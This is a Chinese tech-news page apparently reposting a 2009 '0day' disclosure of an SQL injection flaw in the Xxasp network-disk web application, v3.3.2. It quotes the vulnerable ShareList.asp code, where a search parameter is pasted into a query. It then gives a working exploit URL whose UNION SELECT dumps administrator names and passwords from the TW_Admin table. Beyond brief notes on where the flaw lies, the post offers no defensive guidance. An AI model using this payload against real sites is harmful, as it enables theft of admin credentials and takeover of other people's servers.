pc软件 文章资讯 手机软件

您当前的位置→图文中心新闻资讯安全播报Xxasp网络硬盘v3.3.2 Sql injection 0day
阅读排行

Xxasp网络硬盘v3.3.2 Sql injection 0day


2009/12/7  编辑:admin 来源:本站整理

至于这套系统我就不多介绍了,漏洞涉及文件为MyFiles.asp ShareList.asp,

我以ShareList.asp为例简单分析下,代码如下:

Dim MyOrderBy,MyCondition,MyTopField,SearchType,SearchCondition

SearchType=Trim(Request("SearchType"))

SearchCondition=Trim(Request("SearchCondition"))     //注入点

If SearchType="" Then SearchType="BaseSearch"

If SearchCondition="" Then SearchCondition="1"

MyTopField=""

Select Case SearchType

Case "BaseSearch"

Select Case SearchCondition

Case "2"

MyOrderBy="A.F_AddTime Desc":MyCondition="Datediff('h',A.F_AddTime,"&SqlNowString&")<25"

Case "3"

MyOrderBy="A.F_AddTime Desc":MyCondition="Datediff('d',F_AddTime,"&SqlNowString&")<3"

Case "4"

MyOrderBy="A.F_AddTime Desc":MyCondition="Datediff('d',A.F_AddTime,"&SqlNowString&")<7"

Case "5"

MyOrderBy="A.F_AddTime Desc":MyCondition="Datediff('d',A.F_AddTime,"&SqlNowString&")<21"

Case "6"

MyOrderBy="A.F_AddTime Desc":MyCondition="Datediff('m',A.F_AddTime,"&SqlNowString&")<1"

Case "7"

MyOrderBy="A.F_AddTime Desc":MyCondition="Datediff('m',A.F_AddTime,"&SqlNowString&")<3"

Case "8"

MyTopField="Top 100 ":MyOrderBy="A.F_DownloadTimes Desc":MyCondition=""

Case "9"

If ClsPub.TW_Config(42)<=1 Then

MyOrderBy="A.F_AddTime Desc":MyCondition="Datediff('h',A.F_AddTime,"&SqlNowString&")<25"

Else

MyOrderBy="A.F_AddTime Desc":MyCondition="Datediff('d',A.F_AddTime,"&SqlNowString&")<"&ClsPub.TW_Config(42)

End If

Case "10"

If ClsPub.TW_Config(42)<=1 Then

MyOrderBy="A.F_AddTime Desc":MyCondition="Datediff('h',A.F_AddTime,"&SqlNowString&")>25"

Else

MyOrderBy="A.F_AddTime Desc":MyCondition="Datediff('d',A.F_AddTime,"&SqlNowString&")>"&ClsPub.TW_Config(42)

End If

Case Else

MyOrderBy="A.F_AddTime Desc":MyCondition=""

End Select

Case "SearchFileType"

If SearchCondition<>"1" Then

MyOrderBy="A.F_AddTime Desc":MyCondition="A.F_Ext='"&Lcase(SearchCondition)&"'" //如果SearchCondition不为1,带入sql查询

Else

MyOrderBy="A.F_AddTime Desc":MyCondition=""

End If

exp:注册登陆后,http://www.xxx.com/disk/ShareList.asp?Action=Main&SearchType=SearchFileType&SearchCondition=rar' and 1=2 union select

1,2,3,4,5,6,7,8,9,10,11,AdminName,AdminPwd,14,15,16,17 from TW_Admin where '1'='1

 

相关文章

xp系统弹出“xx内存不能为read或written”提示怎么办:  具体方法如下:  1、移除无效插件程序  在上网冲浪的过程中,许多插件程序会偷偷地安装到计算机系统中,而不少插件程序往往都有防删除的功能,因此这些插件很容易与其他的应用程序发生冲突,从而间接地引起系统内存读写错误的现象。

qq你偷偷在XX脸上写四个字会写啥奖励QQ黄钻:活动截止:11月0回帖格式:QQ号:四个字:活动截止:11月01日晚上8点活动结束后我们将评选出最优秀的回复,奖励黄钻15天体验。

Xxasp网络硬盘v3.3.2 Sql injection 0day:至于这套系统我就不多介绍了,漏洞涉及文件为MyFiles.aspShareList.asp,我以ShareList.asp为例简单分析下,代码如下:DimMyOrderBy,MyCondition,MyTopField,SearchType...。

发表评论
网站帮助 - 广告合作 - 下载声明 - 网站地图